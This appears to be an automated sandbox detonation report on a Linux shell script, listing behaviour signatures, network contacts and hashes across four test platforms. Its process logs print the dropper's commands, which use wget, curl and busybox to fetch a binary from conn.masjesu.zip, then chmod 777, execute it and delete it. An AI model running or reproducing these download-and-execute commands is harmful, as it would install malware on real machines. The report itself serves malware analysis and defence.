Analysis Overview
SHA256
57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649
Threat Level: Shows suspicious behavior
The file 57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
System Network Configuration Discovery
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-21 05:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:10
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:10
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:10
Platform
debian9-mipsbe-20240418-en
Max time kernel
149s
Max time network
65s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/chmod
[chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
[./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/rm
[rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| BG | 87.120.125.191:80 | conn.masjesu.zip | tcp |
Files
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 05:03
Reported
2024-11-21 05:11
Platform
debian9-mipsel-20240611-en
Max time kernel
150s
Max time network
56s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
Processes
/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh
[/tmp/57d39cde21ad2ac6d53e7c94150e4c9c363fc38e10989a6740c21c47f8c19649.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/chmod
[chmod 777 uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
[./uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
/bin/rm
[rm uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM]
Network
Files
/tmp/uD9ClQSN1Ei2Ufba1Ga3i8snS6g54PEcNM
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |